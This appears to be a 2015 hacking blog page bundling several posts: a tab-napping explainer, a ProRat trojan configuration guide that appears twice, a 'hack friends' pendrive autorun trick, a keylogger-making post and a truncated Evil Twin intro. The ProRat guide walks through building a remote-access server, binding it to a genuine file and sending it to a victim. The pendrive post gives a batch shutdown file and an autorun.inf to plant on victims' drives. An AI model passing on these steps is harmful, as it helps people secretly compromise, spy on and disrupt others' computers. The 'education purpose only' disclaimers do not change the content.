Tuesday, August 25, 2015

Tab Napping


         



Tab Napping is a new form of phishing that is hitting the internet now. With the conventional form of phishing, for example, you might receive an email that is supposedly from your bank, and it might ask you to login and update or confirm your account details, of course, there would be a link to your banks website in the email for you to click, which would take you to a page that looks identical to your real banks login page.
How does it worksTab napping is more sophisticated than the phishing scams we’ve seen so far, and it no longer relies on persuading you to click on a dodgy link. Instead it targets internet users who open lots of tabs on their browser at the same time (for example, by pressingCTRL + T). if you have multiple tabs open and you are reading the page on your current active tab, any of the other inactive browser tabs could be replaced with a fake web page that is set up to obtain your personal data, the web page will look exactly the same as the page you opened in the tab, you probably wont even even know it has been replaced with a fake page.fraudsters can actually detect when a tab has been left inactive for a while, and spy on your browser history to find out which websites you regularly visit, and therefore which pages to fake.This may surprise you, but phishers and fraudsters in general can actually detect when a tab has been left inactive for a period of time, which means they can spy on your browsing history, this tells them which websites and web pages you visit on a regularly basis, so they'll know which bank you use and which email account you use, whatever you view, they'll know about it, which means they'll know which fake pages to make to replace the real pages in your inactive tabs, you've now left yourself open to become a victim of tab napping.
How can you protect yourself against tab napping?  Here are five simple ways you can prevent yourself from falling victim: • Make sure you always check the URL in the browser address page is correct before you enter any login details. A fake tabbed page will have a different URL to the website you think you’re using.• Always check the URL has a secure https:// address even if you don’t have tabs open on the browser.• If the URL looks suspicious in any way, close the tab and reopen it by entering the correct URL again.• Avoid leaving tabs open which require you to type in secure login details. Don't open any tabs while doing online banking - open new windows instead (CTRL + N).
Download Tabnapping Script from Azkan website:
Note: Source link may be malicious, open as your own risk..

PRORAT HOW TO USE AND CONFIGURE FULL GUIDE






Requirements :


1. Prorat- Click here to download Trojan Prorat.
2. Hostname  -  Your IP address would probably be dynamic that it keeps changing everytime you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:



1. Log On to www.no-ip.com and register for an account.

2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.




3. Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.

4. Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type 'ping yourhostname' (without quotes) , hopefully it should reply with your IP address.

Tutorial for configuring Trojan :


1. Open prorat.exe that you have downloaded.
2. Click on Create  and then Create ProRat Server





3.  Enter your host name in the ProRat Notification field as shown. Uncheck all other options.





4. Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.





5. Finally click on create  server and now its ready to be sent to victim.  Once victim installs it, it would automatically disable antivirus/firewall



What after victim has run the server part ?
1.Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
2.You will start listening to connections, I mean you will get a notification as shown when victim would be online.








This is for Education Purpose Only ..


Leave Thanks in comments if you like the post

PRORAT HOW TO USE AND CONFIGURE FULL GUIDE






Requirements :


1. Prorat- Click here to download Trojan Prorat.
2. Hostname  -  Your IP address would probably be dynamic that it keeps changing everytime you disconnect and reconnect. You need a host name which always automatically keep pointing to your changing IP. Follow these steps -:



1. Log On to www.no-ip.com and register for an account.

2. Go to Hosts/Redirects -> Add Host and choose any free available hostname. Do not change any other option and simply click on Create Host.




3. Downloading and install their DNS update client available here http://www.no-ip.com/downloads.php Run it and enter your credentials. Update your host name and save it.

4. Lets check whether your IP has been associate with chosen host name or not. Go to command prompt and type 'ping yourhostname' (without quotes) , hopefully it should reply with your IP address.

Tutorial for configuring Trojan :


1. Open prorat.exe that you have downloaded.
2. Click on Create  and then Create ProRat Server





3.  Enter your host name in the ProRat Notification field as shown. Uncheck all other options.





4. Click on general settings Tab and have a look at server port,password, victim name. Remember these things.Check out and configure other options as per your need. You can bind server.exe with any genuine file, change its icon etc.





5. Finally click on create  server and now its ready to be sent to victim.  Once victim installs it, it would automatically disable antivirus/firewall



What after victim has run the server part ?
1.Click on ProConnective Tab and start listening to connections. Allow firewall if it asks you to open a port.
2.You will start listening to connections, I mean you will get a notification as shown when victim would be online.








This is for Education Purpose Only ..


Leave Thanks in comments if you like the post

Hack Friends ComPuter Using Pendrive trick

      • In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College, institute….and Fun With Friends.

Step 1:>>copy this  code into notepad:

@echo off
shutdown -s -t 00
Save as abc.bat extension (for eg: trixhub.bat).
Step 2:  Now open the notepad and copy bellow code and paste in notpad.
[autorun]
Open=besthacking.bat
Action=Mouse Disable
Now Save it as “autorun.inf”
Step 3:    Then copy the two files in your pen drive or victim’s pen drive.
That’s all whenever the victim insert his pen drive,the system will be turned off automatically.

How to Disable This Hack

First Stop Autorun in Your Computer And Then Format Pendrive..
And If You don’t know how to Stop Autorun Check Post How to Disable Autorun in Windows

MAKE YOUR OWN KEYLOGGER.


AIRBORNE TEXT

WHAT IS KEYLOGGER?

A KeyLogger is a computer device or a program that records the real time activity of a computer user including the keyboard keys they press.You can not detect the presence of KeyLogger on your computer since it runs in background(Stealth mode) and also it is not listed in task manager or control panel or privacy purpose. It can be used by parents to keep eye on their children, company owners to spy on their employees or by hackers to steal account and information from the victim's computer.
Make your own undetectable KeyLogger within 10 minutes.Yes,all you need is visual studio and the source code of the KeyLogger which you can download from the link given below.

STEPS FOR MAKING YOUR OWN KEYLOGGER :

  1. Download and install visual studio from here.
  2. Download the source code from here or from the download button given below.
  3. Watch the video tutorial given below about how to make your own KeyLogger within 10 minutes

    Video URL By NERD http://www.youtube.com/watch?v=YI146SJsU6k.

Evil Twin attack

Evil Twin Attack is attack is frequently carried upon wireless access points with malicious intentions. This attack happens when...